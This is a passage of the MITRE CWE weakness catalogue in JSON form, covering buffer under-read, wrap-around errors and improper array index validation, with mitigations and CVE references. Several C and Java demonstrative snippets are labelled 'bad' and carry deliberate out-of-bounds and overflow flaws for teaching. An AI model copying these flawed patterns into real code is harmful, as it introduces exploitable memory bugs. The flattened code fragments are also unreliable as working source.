out-of-bounds read (CWE-126), returning memory that could include private cryptographic keys and other sensitive data.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160"},{"Reference":"CVE-2009-2523","Description":"Chain: product does not handle when an input string is not NULL terminated, leading to buffer over-read or heap-based buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2523"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Buffer over-read"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP8","Entry_Name":"Faulty Buffer Access"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1034"}},{"attr":{"@_External_Reference_ID":"REF-1035"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 5: Buffer Overruns.&#34; Page 89"}}]},"Notes":{"Note":{"#text":"These problems may be resultant from missing sentinel values (CWE-463) or trusting a user-influenced input length variable.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Common_Consequences, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples"}]}},"127":{"attr":{"@_ID":"127","@_Name":"Buffer Under-read","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software reads from a buffer using buffer access mechanisms such as indexes or pointers that reference memory locations prior to the targeted buffer.","Extended_Description":"This typically occurs when the pointer or its index is decremented to a position before the buffer, when pointer arithmetic results in a position before the beginning of the valid memory location, or when a negative index is used. This may result in exposure of sensitive information or possibly a crash.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"125","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"786","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory"},{"Scope":"Confidentiality","Impact":"Bypass Protection Mechanism","Note":"By reading out-of-bounds memory, an attacker might be able to get secret values, such as memory addresses, which can be bypass protection mechanisms such as ASLR in order to improve the reliability and likelihood of exploiting a separate weakness to achieve code execution instead of just denial of service."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Buffer under-read"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP8","Entry_Name":"Faulty Buffer Access"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1034"}},{"attr":{"@_External_Reference_ID":"REF-1035"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 5: Buffer Overruns.&#34; Page 89"}}]},"Notes":{"Note":{"#text":"Under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Common_Consequences, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"128":{"attr":{"@_ID":"128","@_Name":"Wrap-around Error","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Wrap around errors occur whenever a value is incremented past the maximum value for its type and therefore \\"wraps around\\" to a very small, negative, or undefined value.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"190","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}}]},"Background_Details":{"Background_Detail":"Due to how addition is performed by computers, if a primitive is incremented past the maximum value possible for its storage space, the system will not recognize this, and therefore increment each bit as if it still had extra space. Because of how negative numbers are represented in binary, primitives interpreted as signed may \\"wrap\\" to very large negative values."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Instability"],"Note":"This weakness will generally lead to undefined behavior and therefore crashes. In the case of overflows involving loop index variables, the likelihood of infinite loops is also high."},{"Scope":"Integrity","Impact":"Modify Memory","Note":"If the value in question is important to data (as opposed to flow), simple data corruption has occurred. Also, if the wrap around results in other conditions such as buffer overflows, further memory corruption may occur."},{"Scope":["Confidentiality","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Bypass Protection Mechanism"],"Note":"This weakness can sometimes trigger buffer overflows which can be used to execute arbitrary code. This is usually outside the scope of a program\'s implicit security policy."}]},"Potential_Mitigations":{"Mitigation":[{"Description":"Requirements specification: The choice could be made to use a language that is not susceptible to these issues."},{"Phase":"Architecture and Design","Description":"Provide clear upper and lower bounds on the scale of any protocols designed."},{"Phase":"Implementation","Description":"Perform validation on all incremented variables to ensure that they remain within reasonable bounds."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-33"},"Intro_Text":"The following image processing code allocates a table for images.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"img_t table_ptr; /*struct containing img data, 10kB each*/int num_imgs;...num_imgs = get_num_imgs();table_ptr = (img_t*)malloc(sizeof(img_t)*num_imgs);...","xhtml:br":["","","","",""]}},"Body_Text":"This code intends to allocate a table of size num_imgs, however as num_imgs grows large, the calculation determining the size of the list will eventually overflow (CWE-190). This will result in a very small list to be allocated instead. If the subsequent code operates on the list as if it were num_imgs long, it may result in many types of out-of-bounds problems (CWE-119)."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Wrap-around error"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM07-C","Entry_Name":"Ensure that the arguments to calloc(), when multiplied, can be represented as a size_t"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"92"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 5: Buffer Overruns.&#34; Page 89"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Signed Integer Boundaries&#34;, Page 220"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Notes":{"Note":{"#text":"The relationship between overflow and wrap-around needs to be examined more closely, since several entries (including CWE-190) are closely related.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Background_Details, Common_Consequences, Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Background_Details"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations, References"}]}},"129":{"attr":{"@_ID":"129","@_Name":"Improper Validation of Array Index","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses untrusted input when calculating or using an array index, but the product does not validate or incorrectly validates the index to ensure the index references a valid position within the array.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1285","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"823","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"789","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant","Description":"The most common condition situation leading to an out-of-bounds array index is the use of loop index variables as buffer indexes. If the end condition for the loop is subject to a flaw, the index can grow or shrink unbounded, therefore causing a buffer overflow or underflow. Another common situation leading to this condition is the use of a function\'s return value, or the resulting value of a calculation directly as an index in to a buffer."}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":[{"Term":"out-of-bounds array index"},{"Term":"index-out-of-range"},{"Term":"array index underflow"}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Availability"],"Impact":"DoS: Crash, Exit, or Restart","Note":"Use of an index that is outside the bounds of an array will very likely result in the corruption of relevant memory and perhaps instructions, leading to a crash, if the values are outside of the valid memory area."},{"Scope":"Integrity","Impact":"Modify Memory","Note":"If the memory corrupted is data, rather than instructions, the system will continue to function with improper values."},{"Scope":["Confidentiality","Integrity"],"Impact":["Modify Memory","Read Memory"],"Note":"Use of an index that is outside the bounds of an array can also trigger out-of-bounds read or write operations, or operations on the wrong objects; i.e., \\"buffer overflows\\" are not always the result. This may result in the exposure or modification of sensitive data."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"If the memory accessible by the attacker can be effectively controlled, it may be possible to execute arbitrary code, as with a standard buffer overflow and possibly without the use of large inputs if a precise index can be controlled."},{"Scope":["Integrity","Availability","Confidentiality"],"Impact":["DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands","Read Memory","Modify Memory"],"Note":"A single fault could allow either an overflow (CWE-788) or underflow (CWE-786) of the array index. What happens next will depend on the type of operation being performed out of bounds, but can expose sensitive information, cause a system crash, or possibly lead to arbitrary code execution."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.","Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report array index errors that originate from command line arguments in a program that is not expected to run with setuid or other special privileges."]},"Effectiveness":"High","Effectiveness_Notes":"This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":"This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."},{"Method":"Black Box","Description":"Black box methods might not get the needed code coverage within limited time constraints, and a dynamic test might not produce any noticeable side effects even if it is successful."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-7"},"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Use an input validation framework such as Struts or the OWASP ESAPI Validation API. Note that using a framework does not automatically address all input validation problems; be mindful of weaknesses that could arise from misusing the framework itself (CWE-1173)."},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":{"xhtml:p":["For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.","Even though client-side checks provide minimal benefits with respect to server-side security, they are still useful. First, they can support intrusion detection. If the server receives input that should have been rejected by the client, then it may be an indication of an attack. Second, client-side error-checking can provide helpful feedback to the user about the expectations for valid input. Third, there may be a reduction in server-side processing time for accidental input errors, although this is typically a small savings."]}},{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":{"xhtml:p":["Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, Ada allows the programmer to constrain the values of a variable and languages such as Java and Ruby will allow the programmer to handle exceptions when an out-of-bounds index is accessed."]}},{"attr":{"@_Mitigation_ID":"MIT-11"},"Phase":"Operation","Strategy":"Environment Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that randomly arrange the positions of a program\'s executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code.","Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-12"},"Phase":"Operation","Strategy":"Environment Hardening","Description":"Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [REF-60] [REF-61].","Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software\'s state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When accessing a user-controlled array index, use a stringent range of values that are within the target array. Make sure that you do not allow negative values to be used. That is, verify the minimum as well as the maximum of the range of acceptable values."]}},{"attr":{"@_Mitigation_ID":"MIT-35"},"Phase":"Implementation","Description":"Be especially careful to validate all input when invoking code that crosses language boundaries, such as from an interpreted language to native code. This could create an unexpected interaction between the language boundaries. Ensure that you are not violating any of the expectations of the language with which you are interfacing. For example, even though Java may not be susceptible to buffer overflows, providing a large argument in a call to native code might trigger an overflow."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the code snippet below, an untrusted integer value is used to reference an object in an array.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public String getValue(int index) {}","xhtml:div":{"#text":"return array[index];","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"If index is outside of the range of the array, this may result in an ArrayIndexOutOfBounds Exception being raised."},{"attr":{"@_Demonstrative_Example_ID":"DX-34"},"Intro_Text":"The following example takes a user-supplied value to allocate an array of objects and then operates on the array.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private void buildList ( int untrustedListSize ){}","xhtml:div":{"#text":"if ( 0 &gt; untrustedListSize ){}Widget[] list = new Widget [ untrustedListSize ];list[0] = new Widget();","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"die(\\"Negative value supplied for list size, die evil hacker!\\");","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":["",""]}}},"Body_Text":"This example attempts to build a list from a user-specified value, and even checks to ensure a non-negative value is supplied. If, however, a 0 value is provided, the code will build an array of size 0 and then try to store a new Widget in the first location, causing an exception to be thrown."},{"attr":{"@_Demonstrative_Example_ID":"DX-100"},"Intro_Text":"In the following code, the method retrieves a value from an array at a specific array index location that is given as an input parameter to the method","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int getValueFromArray(int *array, int len, int index) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int value;if (index &lt; len) {}else {}return value;","xhtml:br":["","","","","","","","","","","",""],"xhtml:i":["// check that the array index is less than the maximum","// length of the array","// if array index is invalid then output error message","// and return value indicating error"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"value = array[index];","xhtml:br":["",""],"xhtml:i":"// get the value at the specified index of the array"}},{"#text":"printf(\\"Value is: %d\\\\n\\", array[index]);value = -1;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...if (index &gt;= 0 &amp;&amp; index &lt; len) {...","xhtml:br":["","","","","","","",""],"xhtml:i":["// check that the array index is within the correct","// range of values for the array"]}}],"Body_Text":"However, this method only verifies that the given array index is less than the maximum length of the array but does not check for the minimum value (CWE-839). This will allow a negative value to be accepted as the input array index, which will result in a out of bounds read (CWE-125) and may allow access to sensitive memory. The input array index should be checked to verify that is within the maximum and minimum range required for the array (CWE-129). In this example the if statement should be modified to include a minimum range check, as shown below."},{"attr":{"@_Demonstrative_Example_ID":"DX-134"},"Intro_Text":"The following example retrieves the sizes of messages for a pop3 mail server. The message sizes are retrieved from a socket that returns in a buffer the message number and the message size, the message number (num) and size (size) are extracted from the buffer and the message size is placed into an array using the message number for the array index.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int getsizes(int sock, int count, int *sizes) {}","xhtml:br":["",""],"xhtml:i":"/* capture the sizes of all messages */","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...char buf[BUFFER_SIZE];int ok;int num, size;while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0){}","xhtml:br":["","","","","","",""],"xhtml:i":"// read values from socket and added to sizes array","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (DOTLINE(buf))else if (sscanf(buf, \\"%d %d\\", &amp;num, &amp;size) == 2)","xhtml:br":["","",""],"xhtml:i":"// continue read from socket until buf only contains \'.\'","xhtml:div":[{"#text":"break;","attr":{"@_style":"margin-left:10px;"}},{"#text":"sizes[num - 1] = size;","attr":{"@_style":"margin-left:10px;"}}]}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"int getsizes(int sock, int count, int *sizes) {}","xhtml:br":["",""],"xhtml:i":"/* capture the sizes of all messages */","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...char buf[BUFFER_SIZE];int ok;int num, size;while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0){}","xhtml:br":["","","","","","",""],"xhtml:i":"// read values from socket and added to sizes array","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (DOTLINE(buf))else if (sscanf(buf, \\"%d %d\\", &amp;num, &amp;size) == 2) {}","xhtml:br":["","",""],"xhtml:i":"// continue read from socket until buf only contains \'.\'","xhtml:div":[{"#text":"break;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (num &gt; 0 &amp;&amp; num &lt;= (unsigned)count)else","xhtml:div":[{"#text":"sizes[num - 1] = size;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"report(stderr, \\"Warning: ignoring bogus data for message sizes returned by server.\\\\n\\");","xhtml:br":["",""],"xhtml:i":"/* warn about possible attempt to induce buffer overflow */"}}],"xhtml:br":""}}]}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}}],"Body_Text":"In this example the message number retrieved from the buffer could be a value that is outside the allowable range of indices for the array and could possibly be a negative number. Without proper validation of the value to be used for the array index an array overflow could occur and could potentially lead to unauthorized access to memory addresses and system crashes. The value of the array index should be validated to ensure that it is within the allowable range of indices for the array as in the following code."},{"attr":{"@_Demonstrative_Example_ID":"DX-133"},"Intro_Text":"In the following example the method displayProductSummary is called from a Web service servlet to retrieve product summary information for display to the user. The servlet obtains the integer value of the product number from the user and passes it to the displayProductSummary method. The displayProductSummary method passes the integer value of the product number to the getProductSummary method which obtains the product summary from the array object containing the project summaries using the integer value of the product number as the array index.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public String displayProductSummary(int index) {}public String getProductSummary(int index) {}","xhtml:br":["","","","",""],"xhtml:i":"// Method called from servlet to obtain product information","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String productSummary = new String(\\"\\");try {} catch (Exception ex) {...}return productSummary;","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"String productSummary = getProductSummary(index);","attr":{"@_style":"margin-left:10px;"}}}},{"#text":"return products[index];","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public String displayProductSummary(int index) {}public String getProductSummary(int index) {}","xhtml:br":["","","","",""],"xhtml:i":"// Method called from servlet to obtain product information","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String productSummary = new String(\\"\\");try {} catch (Exception ex) {...}return productSummary;","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"String productSummary = getProductSummary(index);","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String productSummary = \\"\\";if ((index &gt;= 0) &amp;&amp; (index &lt; MAX_PRODUCTS)) {}else {}return productSummary;","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"productSummary = products[index];","attr":{"@_style":"margin-left:10px;"}},{"#text":"System.err.println(\\"index is out of bounds\\");throw new IndexOutOfBoundsException();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}]}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"ArrayList productArray = new ArrayList(MAX_PRODUCTS);...try {} catch (IndexOutOfBoundsException ex) {...}","xhtml:br":["",""],"xhtml:div":{"#text":"productSummary = (String) productArray.get(index);","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":["In this example the integer value used as the array index that is provided by the user may be outside the allowable range of indices for the array which may provide unexpected results or cause the application to fail. The integer value used for the array index should be validated to ensure that it is within the allowable range of indices for the array as in the following code.","An alternative in Java would be to use one of the collection objects such as ArrayList that will automatically generate an exception if an attempt is made to access an array index that is out of bounds."]},{"attr":{"@_Demonstrative_Example_ID":"DX-90"},"Intro_Text":"The following example asks a user for an offset into an array to select an item.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main (int argc, char **argv) {}","xhtml:br":"","xhtml:div":{"#text":"char *items[] = {\\"boat\\", \\"car\\", \\"truck\\", \\"train\\"};int index = GetUntrustedOffset();printf(\\"You selected %s\\\\n\\", items[index-1]);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"The programmer allows the user to specify which element in the list to select, however an attacker can provide an out-of-bounds offset, resulting in a buffer over-read (CWE-126)."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-0369","Description":"large ID in packet used as array index","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0369"},{"Reference":"CVE-2001-1009","Description":"negative array index as argument to POP LIST command","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1009"},{"Reference":"CVE-2003-0721","Description":"Integer signedness error leads to negative array index","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0721"},{"Reference":"CVE-2004-1189","Description":"product does not properly track a count and a 